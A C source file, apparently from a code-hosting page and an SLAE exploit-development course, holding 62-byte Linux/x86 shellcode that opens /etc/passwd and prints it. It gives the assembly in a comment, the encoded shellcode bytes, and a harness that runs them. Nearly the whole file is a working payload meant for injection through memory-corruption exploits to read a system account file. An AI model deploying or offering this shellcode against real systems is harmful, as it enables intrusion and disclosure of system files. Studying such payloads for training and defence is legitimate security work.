66 lines
No EOL
1.1 KiB
C
66 lines
No EOL
1.1 KiB
C
/*
|
|
; Title : Linux/x86 - Read /etc/passwd Shellcode (62 bytes)
|
|
; Date : May, 2018
|
|
; Author : Nuno Freitas
|
|
; Blog Post : https://bufferoverflowed.wordpress.com/slae32/slae-32-polymorphing-shellcodes/
|
|
; Twitter : @nunof11
|
|
; SLAE ID : SLAE-1112
|
|
; Size : 62 bytes
|
|
; Tested on : i686 GNU/Linux
|
|
|
|
section .text
|
|
|
|
global _start
|
|
|
|
_start:
|
|
xor eax, eax
|
|
jmp two
|
|
|
|
one:
|
|
pop ebx
|
|
mov al, 0x5
|
|
int 0x80
|
|
mov esi, eax
|
|
jmp read
|
|
|
|
exit:
|
|
mov al, 0x1
|
|
xor ebx, ebx
|
|
int 0x80
|
|
|
|
read:
|
|
mov ebx, esi
|
|
mov al, 0x3
|
|
mov ecx, esp
|
|
mov dl, 0x01
|
|
int 0x80
|
|
|
|
xor ebx, ebx
|
|
cmp eax, ebx
|
|
je exit
|
|
|
|
mov al, 0x4
|
|
mov bl, 0x1
|
|
int 0x80
|
|
|
|
inc esp
|
|
jmp read
|
|
|
|
two:
|
|
call one
|
|
string: db "/etc/passwd"
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
unsigned char shellcode[] = \
|
|
"\x31\xc9\xf7\xe1\xeb\x28\x5b\xb0\x05\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x89\xe1\xb2\x01\xcd\x80\x31\xdb\x39\xd8\x74\xea\xb0\x04\xb3\x01\xcd\x80\x44\xeb\xe7\xe8\xd3\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
|
|
|
|
void main()
|
|
{
|
|
printf("Shellcode Length: %d\n", strlen(shellcode));
|
|
|
|
int (*ret)() = (int(*)())shellcode;
|
|
ret();
|
|
} |